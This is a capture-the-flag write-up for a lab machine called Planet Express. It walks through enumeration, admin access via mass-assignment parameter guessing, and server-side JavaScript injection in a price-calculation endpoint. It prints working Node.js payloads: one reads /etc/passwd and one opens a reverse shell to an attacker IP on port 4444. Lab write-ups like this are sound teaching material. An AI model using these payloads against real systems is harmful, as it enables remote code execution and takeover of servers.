THM: Planet Express (Hard)

Fast, affordable, and out of this world!

This CTF is not yet available publically, but hopefully soon!

Flag 1

Enumeration

We discover what ports are open, and se 80 HTTP and 22 SSH.

nmap 10.10.227.249

nmap results

We can scan for directories and leave that running while we explore the site manually.

ffuf -u http://10.10.227.249/FUZZ -w /usr/share/wordlists/dirb/common.txt

ffuf results

Browsing to /admin gives us an error.

access to /admin is denied

Register an account.

register an account

We still get access denied to the /admin endpoint. So we will try to create an account with admin privileges using mass assignment.

Exploitation

There are a number of combinations we can try, such as:

admin=true
admin=1
account=admin
account=administrator
privilege=admin
privilege=administrator
privs=true
privileges=admin
privileges=administrator

Writing a short script to create potential payloads is the easiest way to do this, but give the error message mentions "privilege" and "admin" we will focus on those.

creating an account and attempting mass assignment

We login to the account after it's created, and then try to access /admin.

/admin

We are successful! The first flag is given to us on the page.

Flag 2

Enumeration

Clicking "calculate price" gives updates the page with a number. And in our proxy we can see a POST request.

calculate price

/calculate-price

Exploitation

Sending modified requests indicates that the application may be passing the values into a function such as eval() as it can interpret things such as +1 and -1 correctly rather than throwing an error.

orderId=64294f0e569035c8dbe5cdb5&length=51&height=51&width=51&weight=5001
{"price":182661}

orderId=64294f0e569035c8dbe5cdb5&length=51&height=51&width=51&weight=5001-1
{"price":182660}

orderId=64294f0e569035c8dbe5cdb5&length=51&height=51&width=51&weight=5001/0
{"price":null}

We can test RCE with the following payload.

;fs=require('fs');fs.readFileSync('/etc/passwd').toString()

RCE

We can upgrade to a shell with the following payload.

;(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(4444, "<your-ip>", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/;})();

upgrading to a shell

catching the reverse shell

That's it! I hope you enjoyed the challenge and learned a bit about mass assignment and RCE in node.js applications 👍

If you like my content, please feel free to connect on LinkedIn or drop into one of our live streams!

https://www.linkedin.com/in/alex-olsen-47119322/

please feel free to connect :)